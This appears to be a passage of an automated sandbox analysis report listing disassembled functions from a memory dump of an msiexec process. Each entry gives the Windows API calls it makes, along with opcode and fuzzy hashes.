                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • _snwprintf.MSVCRT ref: 0041100C
                                                                                                        • wcscat.MSVCRT ref: 0041101F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 822687973-0
                                                                                                        • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                        • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                        • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                        • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                        Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                        • malloc.MSVCRT ref: 00417459
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                                        • free.MSVCRT ref: 0041747F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2605342592-0
                                                                                                        • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                        • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                        Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2678498856-0
                                                                                                        • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                        • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                        Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 3888421826-0
                                                                                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                        Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00417B7B
                                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                        • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3727323765-0
                                                                                                        • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                        • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                        Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F673
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                        • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                        Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                        • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                        Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402FD7
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                        • strlen.MSVCRT ref: 00403006
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                        • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                        • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                        • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                        Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$CloseHandle
                                                                                                        • String ID: General
                                                                                                        • API String ID: 3722638380-26480598
                                                                                                        • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                        • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                        Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 764393265-0
                                                                                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                        Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$System$File$LocalSpecific
                                                                                                        • String ID:
                                                                                                        • API String ID: 979780441-0
                                                                                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                        Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 1386444988-0
                                                                                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                        Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                        Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InvalidateMessageRectSend
                                                                                                        • String ID: d=E
                                                                                                        • API String ID: 909852535-3703654223
                                                                                                        • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                        • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                        • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                        • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                        Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcschr$memcpywcslen
                                                                                                        • String ID: "
                                                                                                        • API String ID: 1983396471-123907689
                                                                                                        • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                        • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                        Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                        • _memicmp.MSVCRT ref: 0040C00D
                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer_memicmpmemcpy
                                                                                                        • String ID: URL
                                                                                                        • API String ID: 2108176848-3574463123
                                                                                                        • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                        • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                        • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                        • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                        Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _snwprintf.MSVCRT ref: 0040A398
                                                                                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemcpy
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2789212964-323797159
                                                                                                        • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                        • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                        Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf
                                                                                                        • String ID: %%-%d.%ds
                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                        • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                        • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                        Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040E770
                                                                                                        • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendmemset
                                                                                                        • String ID: F^@
                                                                                                        • API String ID: 568519121-3652327722
                                                                                                        • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                        • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                        Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PlacementWindowmemset
                                                                                                        • String ID: WinPos
                                                                                                        • API String ID: 4036792311-2823255486
                                                                                                        • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                        • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                        Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@DeleteObject
                                                                                                        • String ID: r!A
                                                                                                        • API String ID: 1103273653-628097481
                                                                                                        • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                        • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                        Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                        • wcscat.MSVCRT ref: 0040DCFF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
